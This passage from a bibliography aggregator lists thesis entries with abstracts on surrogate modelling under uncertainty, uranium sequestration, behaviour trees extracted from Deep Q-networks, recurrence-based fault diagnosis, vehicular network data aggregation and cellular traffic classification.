The proposed study develops a framework that can accurately capture and model input and output variables for multidisciplinary systems to mitigate the computational cost when uncertainties are involved. The dimension of the random input variables is reduced depending on the degree of correlation calculated by relative entropy. Feature extraction methods; namely Principal Component Analysis (PCA), the Auto-Encoder (AE) algorithm are developed when the input variables are highly correlated. The Independent Features Test (IndFeaT) is implemented as the feature selection method if the correlation is low to select a critical subset of model features. Moreover, Artificial Neural Network (ANN) including Probabilistic Neural Network (PNN) is integrated into the framework to correctly capture the complex response behavior of the multidisciplinary system with low computational cost. The efficacy of the proposed method is demonstrated with electro-mechanical engineering examples including a solder joint and stretchable patch antenna examples.
APA, Harvard, Vancouver, ISO, and other styles
46

Saunders, Gregory David. "The sequestration and detection of aqueous uranium using a novel network polymer." Thesis, University of York, 1999. http://ethos.bl.uk/OrderDetails.do?uin=uk.bl.ethos.323692.

Full text
APA, Harvard, Vancouver, ISO, and other styles
47

Nordström, Zacharias. "Extracting Behaviour Trees from Deep Q-Networks : Using learning from demostration to transfer knowledge between models." Thesis, Linköpings universitet, Artificiell intelligens och integrerade datorsystem, 2020. http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-169858.

Full text
Abstract:
In recent years the advancement in machine learning have solved more and more complex problems. But still these techniques are not commonly used in the industry. One problem is that many of the techniques are black boxes, it is hard to analyse them to make sure that their behaviour is safe. This property makes them unsuitable for safety critical systems. The goal of this thesis is to examine if the deep learning technique Deep Q-network could be used to create a behaviour tree that can solve the same problem. A behaviour tree is a tree representation of a flow structure that is used for representing behaviours, often used in video games or robotics. To solve the problem two simulators are used, one models a cart that shall balance a pole called cart pole, the other is a static world which needs to be navigated called grid world. Inspiration is taken from the learning from demonstration field to use the Deep Q-network as a teacher and then create a decision tree. During the creation of the decision tree two attributes are used for pruning; to look at the trees accuracy or performance. The thesis then compare three techniques, called Naive, BT Espresso, and BT Espresso Simplified. The techniques are used to transform the extracted decision tree into a behaviour tree. When it comes to the performance of the created behaviour trees they all manage to complete the simulator scenarios in the same, or close to, capacity as the trained Deep Q-network. The trees created from the performance pruned decision tree are generally smaller and less complex, but they have worse accuracy. For cart pole the trees created from the accuracy pruned tree has around 10 000 nodes but the performance pruned trees have around 10-20 nodes. The difference in grid world is smaller going from 35-45 nodes to 40-50 nodes. To get the smallest tree with the best performance then the performance pruned tree should be used with the BT Espresso Simplified algorithm. This thesis have shown that it is possible to use knowledge from a trained Deep Q-network model to create a Behaviour tree that can complete the same task.
Under de senaste åren har ett antal framsteg inom maskininlärning gjorts vilket har lett till att mer och mer komplexa problem har kunnat lösas. Dock är dessa tekniker ofta inte använda av industrin. Ett av problemen är att många av de bättre teknikerna beter sig som svarta lådor, det är väldigt svårt att analyser vad de kommer att göra. Denna egenskap gör att de inte är lämpliga att användas i säkerhetskritiska system. Målet med denna avhandling är att undersöka möjligheten att använda den djupa inlärningstekniken djupa q-nätverk kan användas för att skapa ett beteendeträd som är kapabelt att lösa samma problem. Ett beteendeträd är en flödesstruktur som används för att representera beteenden, ofta använt i dataspel eller för robotar. För att undersöka problemet så används två simulatorer, den ena modellerar en vagn som ska balansera en stav och kallas vagnstav (cart pole). Den andra simulatorn är en statisk värld där målet för agenten är att ta sig till en definierad målplats, vilken kallas rutvärld (grid world). För att lösa problemet tas inspiration från ett angränsande fält kallat inlärning från demonstration. Istället för att använda en mänsklig lärare ansätts det djupa q-nätverket som lärare och används för att skapa ett beslutsträd. Beslutsträdet är sedan reducerat genom att kolla på trädets träffsäkerhet eller hur mycket belöning trädet får. Tre tekniker jämförs för att transformera beslutsträdet till ett beteendeträd, teknikerna heter Naiv, BT Espresso och BT Espresso förenklad. Alla skapade beteendeträd lyckas klara av problemet i simulatorn de är skapade för. De hade liknande prestanda som det djupa q-nätverket. När beslutsträden var reducerat på belöning resulterade det i generellt mindre beteendeträd, dock så hade de inte full träffsäkerhet mot det djupa q-nätverket. För vagnstav simulatorn hade beteendeträden som skapats från träffsäkerhets beslutsträden runt 10 000 noder, mot belönings kapade träd som hade runt 10–20 noder. I rutvärlden var skillnaden mindre med 40–50 noder för träd skapade från träffsäkerhet reducerade beslutsträde och 35–45 noder för belöning reducerade beslutsträd. Denna avhandling har påvisat att det går att skapa beteende träd från en tränad djup q-nätverksmodell för ett scenario och om det minsta trädet som klarar scenariot är att önskat bör belönings reducerade beslutsträd användas med BT Espresso förenkling algoritmen.
APA, Harvard, Vancouver, ISO, and other styles
48

Chen, Yun. "Mining Dynamic Recurrences in Nonlinear and Nonstationary Systems for Feature Extraction, Process Monitoring and Fault Diagnosis." Scholar Commons, 2016. http://scholarcommons.usf.edu/etd/6072.

Full text
Abstract:
Real-time sensing brings the proliferation of big data that contains rich information of complex systems. It is well known that real-world systems show high levels of nonlinear and nonstationary behaviors in the presence of extraneous noise. This brings significant challenges for human experts to visually inspect the integrity and performance of complex systems from the collected data. My research goal is to develop innovative methodologies for modeling and optimizing complex systems, and create enabling technologies for real-world applications. Specifically, my research focuses on Mining Dynamic Recurrences in Nonlinear and Nonstationary Systems for Feature Extraction, Process Monitoring and Fault Diagnosis. This research will enable and assist in (i) sensor-driven modeling, monitoring and optimization of complex systems; (ii) integrating product design with system design of nonlinear dynamic processes; and (iii) creating better prediction/diagnostic tools for real-world complex processes. My research accomplishments include the following. (1) Feature Extraction and Analysis: I proposed a novel multiscale recurrence analysis to not only delineate recurrence dynamics in complex systems, but also resolve the computational issues for the large-scale datasets. It was utilized to identify heart failure subjects from the 24-hour heart rate variability (HRV) time series and control the quality of mobile-phone-based electrocardiogram (ECG) signals. (2) Modeling and Prediction: I proposed the design of stochastic sensor network to allow a subset of sensors at varying locations within the network to transmit dynamic information intermittently, and a new approach of sparse particle filtering to model spatiotemporal dynamics of big data in the stochastic sensor network. It may be noted that the proposed algorithm is very general and can be potentially applicable for stochastic sensor networks in a variety of disciplines, e.g., environmental sensor network and battlefield surveillance network. (3) Monitoring and Control: Process monitoring of dynamic transitions in complex systems is more concerned with aperiodic recurrences and heterogeneous types of recurrence variations. However, traditional recurrence analysis treats all recurrence states homogeneously, thereby failing to delineate heterogeneous recurrence patterns. I developed a new approach of heterogeneous recurrence analysis for complex systems informatics, process monitoring and anomaly detection. (4) Simulation and Optimization: Another research focuses on fractal-based simulation to study spatiotemporal dynamics on fractal surfaces of high-dimensional complex systems, and further optimize spatiotemporal patterns. This proposed algorithm is applied to study the reaction-diffusion modeling on fractal surfaces and real-world 3D heart surfaces.
APA, Harvard, Vancouver, ISO, and other styles
49

Zekri, Dorsaf. "Agrégation et extraction des connaissances dans les réseaux inter-véhicules." Thesis, Evry, Institut national des télécommunications, 2013. http://www.theses.fr/2013TELE0001/document.

Full text
Abstract:
Les travaux réalisés dans cette thèse traitent de la gestion des données dans les réseaux inter-véhiculaires (VANETs). Ces derniers sont constitués d’un ensemble d’objets mobiles qui communiquent entre eux à l’aide de réseaux sans fil de type IEEE 802.11, Bluetooth, ou Ultra Wide Band (UWB). Avec de tels mécanismes de communication, un véhicule peut recevoir des informations de ses voisins proches ou d’autres plus distants, grâce aux techniques de multi-sauts qui exploitent dans ce cas des objets intermédiaires comme relais. De nombreuses informations peuvent être échangées dans le contexte des «VANETs», notamment pour alerter les conducteurs lorsqu’un événement survient (accident, freinage d’urgence, véhicule quittant une place de stationnement et souhaitant en informer les autres, etc.). Au fur et à mesure de leurs déplacements, les véhicules sont ensuite « contaminés » par les informations transmises par d’autres. Dans ce travail, nous voulons exploiter les données de manière sensiblement différente par rapport aux travaux existants. Ces derniers visent en effet à utiliser les données échangées pour produire des alertes aux conducteurs. Une fois ces données utilisées, elles deviennent obsolètes et sont détruites. Dans ce travail, nous cherchons à générer dynamiquement à partir des données collectées par les véhicules au cours de leur trajet, un résumé (ou agrégat) qui fourni des informations aux conducteurs, y compris lorsqu’aucun véhicule communicant ne se trouve pas à proximité. Pour ce faire, nous proposons tout d’abord une structure d’agrégation spatio-temporelle permettant à un véhicule de résumer l’ensemble des événements observés. Ensuite, nous définissons un protocole d’échange des résumés entre véhicules sans l’intermédiaire d’une infrastructure, permettant à un véhicule d’améliorer sa base de connaissances locale par échange avec ses voisins. Enfin, nous définissons nos stratégies d’exploitation de résumé afin d’aider le conducteur dans la prise de décision. Nous avons validé l’ensemble de nos propositions en utilisant le simulateur « VESPA » en l’étendant pour prendre en compte la notion de résumés. Les résultats de simulation montrent que notre approche permet effectivement d’aider les conducteurs à prendre de bonnes décisions, sans avoir besoin de recourir à une infrastructure centralisatrice
The works in this thesis focus on data management in inter-vehicular networks (VANETs). These networks consist of a set of moving objects that communicate with wireless networks IEEE 802.11, Bluetooth, or Ultra Wide Band (UWB). With such communication mechanisms, a vehicle may receive information from its close neighbors or other more remote, thanks to multi-jump techniques that operate in this case intermediate objects as relays. A lot of information can be exchanged in the context of « VANETs », especially to alert drivers when an event occurs (accident, emergency braking, vehicle leaving a parking place and want to inform others, etc.). In their move vehicles are then « contaminated » by the information provided by others. In this work, we use the data substantially different from the existing work. These are, in fact, use the data exchanged to produce alerts drivers. Once these data are used, they become obsolete and are destroyed. In this work, we seek to generate dynamically from data collected by vehicles in their path, a summary (or aggregate) which provides information to drivers, including when no communicating vehicle is nearby. To do this, we first propose a spatio-temporal aggregation structure enabling a vehicle to summarize all the observed events. Next, we define a protocol for exchanging summaries between vehicles without the mediation of an infrastructure, allowing a vehicle to improve its local knowledge base by exchange with its neighbors. Finally, we define our operating strategies of the summary to assist the driver in making decision. We validated all of our proposals using the «VESPA» simulator by extending it to take into account the concept of summaries. Simulation results show that our approach can effectively help drivers make good decisions without the need to use a centralized infrastructure
APA, Harvard, Vancouver, ISO, and other styles
50

Kurien, Anish Mathew. "Approches pour la classification du trafic et l’optimisation des ressources radio dans les réseaux cellulaires : application à l’Afrique du Sud." Thesis, Paris Est, 2012. http://www.theses.fr/2012PEST1090/document.

Full text
Abstract:
Selon l'Union Internationale des Télécommunications (UIT), la progression importante du nombre de téléphones mobiles à travers le monde a dépassé toutes les prévisions avec un nombre d'utilisateurs estimé à 6 Mds en 2011 dont plus de 75% dans les pays développés. Cette progression importante produit une pression forte sur les opérateurs de téléphonie mobile concernant les ressources radio et leur impact sur la qualité et le degré de service (GoS) dans le réseau. Avec des demandes différenciées de services émanant de différentes classes d'utilisateurs, la capacité d'identifier les types d'utilisateurs dans le réseau devient donc vitale pour l'optimisation de l'infrastructure et des ressources. Dans la présente thèse, une nouvelle approche de classification des utilisateurs d'un réseau cellulaire mobile est proposée, en exploitant les données du trafic réseau fournies par deux opérateurs de téléphonie mobile en Afrique du Sud. Dans une première étape, celles-ci sont décomposées en utilisant deux méthodes multi-échelles ; l'approche de décomposition en mode empirique (Empirical Mode Decomposition approach - EMD) et l'approche en Ondelettes Discrètes (Discrete Wavelet Packet Transform approach - DWPT). Les résultats sont ensuite comparés avec l'approche dite de Difference Histogram qui considère le nombre de segments de données croissants dans les séries temporelles. L'approche floue de classification FCM (Fuzzy C-means) est utilisée par la suite pour déterminer les clusters, ou les différentes classes présentes dans les données, obtenus par analyse multi-échelles et par différence d'histogrammes. Les résultats obtenus montrent, pour la méthode proposée, une séparation claire entre les différentes classes de trafic par rapport aux autres méthodes. La deuxième partie de la thèse concerne la proposition d'une approche d'optimisation des ressources réseau, qui prend en compte la variation de la demande en termes de trafic basée sur les classes d'abonnés précédemment identifiés dans la première partie. Une nouvelle approche hybride en deux niveaux pour l'allocation des canaux est proposée. Le premier niveau considère un seuil fixe de canaux alloués à chaque cellule en prenant en considération la classe d'abonnés identifiée par une stratégie statique d'allocation de ressources tandis que le deuxième niveau considère une stratégie dynamique d'allocation de ressources. Le problème d'allocation de ressources est formulé comme un problème de programmation linéaire mixte (Mixed-Integer Linear programming - MILP). Ainsi, une approche d'allocation par période est proposée dans laquelle un groupe de canaux est alloué de façon dynamique pour répondre à la variation de la demande dans le réseau. Pour résoudre le problème précédent, nous avons utilisé l'outil CPLEX. Les résultats obtenus montrent qu'une solution optimale peux être atteinte par l'approche proposée (MILP)
The growth in the number of cellular mobile subscribers worldwide has far outpaced expected rates of growth with worldwide mobile subscriptions reaching 6 Billion subscribers in 2011 according to the International Telecommunication Union (ITU). More than 75% of this figure is in developing countries. With this rate of growth, greater pressure is placed on radio resources in mobile networks which impacts on the quality and grade of service (GOS) in the network. With varying demands that are generated from different subscriber classes in a network, the ability to distinguish between subscriber types in a network is vital to optimise infrastructure and resources in a mobile network. In this study, a new approach for subscriber classification in mobile cellular networks is proposed. In the proposed approach, traffic data extracted from two network providers in South Africa is considered. The traffic data is first decomposed using traditional feature extraction approaches such as the Empirical Mode Decomposition (EMD) and the Discrete Wavelet Packet Transform (DWPT) approach. The results are then compared with the Difference Histogram approach which considers the number of segments of increase in the time series. Based on the features extracted, classification is then achieved by making use of a Fuzzy C-means algorithm. It is shown from the results obtained that a clear separation between subscriber classes based on inputted traffic signals is possible through the proposed approach. Further, based on the subscriber classes extracted, a novel two-level hybrid channel allocation approach is proposed that makes use of a Mixed Integer Linear Programming (MILP) model to consider the optimisation of radio resources in a mobile network. In the proposed model, two levels of channel allocation are considered: the first considers defining a fixed threshold of channels allocated to each cell in the network. The second level considers a dynamic channel allocation model to account for the variations in traffic experienced in each traffic class identified. Using the optimisation solver, CPLEX, it is shown that an optimal solution can be achieved with the proposed two-level hybrid allocation model
APA, Harvard, Vancouver, ISO, and other styles
We offer discounts on all premium plans for authors whose works are included in thematic literature selections. Contact us to get a unique promo code!

To the bibliography